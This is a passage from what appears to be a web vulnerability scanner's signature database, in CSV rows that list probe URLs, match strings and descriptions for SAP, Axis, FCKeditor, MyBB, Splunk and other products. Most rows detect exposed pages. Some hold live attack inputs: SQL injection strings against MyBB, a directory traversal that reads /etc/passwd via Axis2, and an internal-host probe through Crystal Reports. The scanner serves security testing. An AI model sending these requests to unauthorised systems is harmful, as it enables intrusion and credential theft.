"006449","0","18","/fx29id1.txt","GET","Fx29ID","","","","","Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.","",""
"006450","0","18","/fx29id2.txt","GET","Fx29ID","","","","","Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.","",""
"006451","0","b","/gif/hp_invent_logo.gif","GET","200","","","","","This device may be an HP printer/scanner and allow retrieval of previously scanned images.","",""
"006452","0","b","/gif/tricolor_ink_guage.gif","GET","200","","","","","This device may be an HP printer/scanner and allow retrieval of previously scanned images.","",""
"006453","0","b1","/logon/logonServlet","GET","User Management","","","","","SAP NetWeaver admin interface found.","",""
"006454","0","3","/AdobeDocumentServicesSec/Config/bindings?wsdl&style=http","GET","><b>\&nbsp;\&nbspThe file:","","does not exist","","","SAP J2EE server reveals the disk path with certain invalid requests.","",""
"006455","0","23","/services","GET","And now\.\.\. Some Services","","","","","Axis web services reveals information about all installed web services. See http://ws.apache.org/axis/java/security.html to secure Axis.","",""
"006456","0","23","/happyaxis.jsp","GET","Examining webapp configuration","","","","","Axis file reveals sensitive information about the Axis installation components. See http://ws.apache.org/axis/java/security.html to secure Axis.","",""
"006457","0","2","/apidocs/index.html","GET","designed to be viewed using the frames","","","","","SAP J2EE Engine help.","",""
"006457","0","2","/bcb/bcbadmSystemInfo.jsp","GET","SAP SOAP URL:","","","","","SAP Business Communication Broker (bcb) may reveal system information.","",""
"006458","0","2","/bcb/bcbadmStart.jsp","GET","BCB-Administration","","","","","SAP Business Communication Broker (bcb) may reveal system information and allow configuration.","",""
"006459","0","23","/GRMGHeartBeat/HTTPGRMGTest.html","GET","This is test page for GRMG","","","","","SAP GRMG test page.","",""
"006460","0","23","/meSync/HttpGRMGTest.html","GET","This is test page for GRMG","","","","","SAP GRMG test page.","",""
"006461","0","23","/htmlb/index.html","GET","HTMLB for Java","","","","","SAP HTMLB pages.","",""
"006462","0","23","/SQLTrace/index.html","GET","Welcome to SQLTrace","","","","","SAP SQLTrace may disclose sensitive information.","",""
"006463","0","23","/TestJDBC_Web/TestJDBCPage.jsp","GET","Please select a connection","","","","","SAP Test JDBC Page may allow unauthorized access to resources or provide detailed errors.","",""
"006464","0","23","/uddiclient/jsps/index.jsp","GET","HTML Business for Java","","","","","SAP UDDI Tool is available remotely.","",""
"006465","0","b12","/~/index.html","GET","SAP NetWeaver","","","","","SAP NetWeaver default page links to other admin areas.","",""
"006466","0","b12","/webdynpro/welcome/Welcome.jsp","GET","Web Dynpro Welcome","","","","","SAP NetWeaver Web Dynpro Tool Applications.","",""
"006467","0","b","/sites/","GET","Plone are now up and running","","","","","Zope/Plone were found. Try adding a new site!.","",""
"006468","3093","0","@FCKEDITOReditor/filemanager/browser/default/frmupload.html","GET","Upload a new file","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"006469","3093","23","@FCKEDITORlicense.txt","GET","Frederico","","","","","FCKeditor license file found.","",""
"006470","3093","1","@FCKEDITORfckconfig.js","GET","FCKConfig","","","","","FCKeditor JavaScript file found.","",""
"006471","3093","23","@FCKEDITOR_whatsnew.html","GET","CreateFCKeditor","","","","","FCKeditor changes file found.","",""
"006472","3093","0","@FCKEDITOReditor/filemanager/browser/default/browser.html","GET","Resources Browser","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"006473","0","1b","/reportserver/","GET","Microsoft SQL Server Reporting Services","","","","","Microsoft SQL Server Reporting Services","",""
"006474","0","2","/j2ee/examples/servlets/","GET","This is a collection","","","","","Oracle j2ee example servlets.","",""
"006475","0","2","/j2ee/examples/jsp/","GET","This is a collection","","","","","Oracle j2ee example JSP pages.","",""
"006476","3092","1","/messages/","GET","200","","","","","This might be interesting...","",""
"006477","0","23","@CRYSTALREPORTSviewrpt.cwr?id=1&wid=1&apstoken=127.0.0.2:0@111","GET","Server 127\.0\.0\.2:0 not found","","","","","Crystal Reports can be used to scan internal hosts. See http://tinyurl.com/2f4r2o9","",""
"006478","0","b","/console-selfservice/","GET","console header","","","","","RSA Self-Service Console found","",""
"006479","68662","8","/axis2/axis2-web/HappyAxis.jsp","GET","Axis2 Happiness Page","","","","","SAP BusinessObjects dswsbobje.war deploys Axis2 with a static admin password. See http://www.rapid7.com/security-center/advisories/R7-0037.jsp","",""
"006480","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue\.","","","Sorry, but no results were returned","","MyBB 1.6 contains an SQL Injection in the keywords parameter of search.php.  See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
"006481","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue\.","","","Sorry, but no results were returned","","MyBBx 1.6 contains an SQL Injection in the keywords parameter of private.php. See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""
"006482","0","3","/en-GB/debug/sso","GET","SSO Enabled","","","","","Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.","",""
"006483","0","3","/en-US/debug/sso","GET","SSO Enabled","","","","","Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.","",""
"006484","0","3","/default.htm","GET","Behind Every Great Web Site","","","","","Default EPiServer file found","",""
"006485","0","8","/axis2/axis2-web/HappyAxis.jsp","GET","Back Home","","","","","Apache Axis2 was found","",""
"006486","59001","7","/axis2/services/Version?xsd=../../../../../../../../../../../etc/passwd","GET","root:","","","","","Apache Axis2 contains a directory traversal in the Version program.","",""